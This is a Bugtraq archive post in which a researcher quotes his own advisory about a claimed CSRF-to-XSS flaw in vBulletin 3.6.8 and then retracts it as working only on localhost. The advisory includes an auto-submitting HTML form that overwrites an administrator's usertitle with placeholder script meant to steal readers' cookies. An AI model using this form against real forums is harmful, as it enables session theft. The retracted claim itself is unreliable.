Bugtraq mailing list archives
Re: vBulletin 3.6.8 XSRF/XSS Vulnerability
From: nbbn () gmx net
Date: Mon, 7 Jan 2008 17:51:07 +0100
Am Samstag 05 Januar 2008 22:46:14 schrieb nbbn () gmx net:
############################################################### Autor: NBBN Founded: 5, January 2008 vBulletin Version: 3.6.8 Patch Level x and possible lower Type: XSRF/XSS Risk: Medium ############################################################### ##Explanation(english)## My english is bad, but I try :-) . vBulletin 3.6.8 is XSRF vulnurable. Administrators can use html in there own usertitle. An attacker can update the profile of an administrator by sending a link to a site with a code like this: <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile"; method="POST" name="form"> <input type="hidden" name="s" value=""> <input type="hidden" name="do" value="updateprofile"> <input type="hidden" name="customtext" value="###########XSS CODE#########"> <!-- Attacker's XSS Code --> <input type="hidden" name="month" value="-1"> <input type="hidden" name="day" value="-1"> <input type="hidden" name="year" value=""> <input type="hidden" name="oldbirthday" value=""> <input type="hidden" name="showbirthday" value="2"> <input type="hidden" name="homepage" value=""> <input type="hidden" name="icq" value=""> <input type="hidden" name="aim" value=""> <input type="hidden" name="msn" value=""> <input type="hidden" name="yahoo" value=""> <input type="hidden" name="skype" value=""> </form> </body> </html> If an attacker send a link in a pm for example, to the admin with a site like the example code, the admin's usertitle updating and have a the code of the attacker.The code executing if the admin have a post done in a thread etc. An attacker can use this to steal the cookie of all user's who are reading the thread. ##Explanation(Deutsch/German)##: In vBulletin 3.6.8 gibt es eine XSRF Lücke, die dazu benutzt werden kann, um XSS Code auszuführen. Admins können in ihren eigenen Benutzerrang HTML Code verwenden. Das kann ein Angreifer ausnutzen um beliebigen html/javascript code auszuführen, wenn er den oben stehenden code in eine Seite packt und dann dem Admin eine Private Nachricht sendet, mit einem Link zu einer Seite mit dem obigen HTML-Code. Somit ist es dem Angreifer möglich, alle Cookies von den Benutzern zu klauen, die gerade einen Thread lesen,in welchem ein Administrator gepostet hat.
Sorry this not work, tested only at localhost, but from remote host's it doesn't work.
Current thread:
- vBulletin 3.6.8 XSRF/XSS Vulnerability nbbn (Jan 07)
- Re: vBulletin 3.6.8 XSRF/XSS Vulnerability nbbn (Jan 07)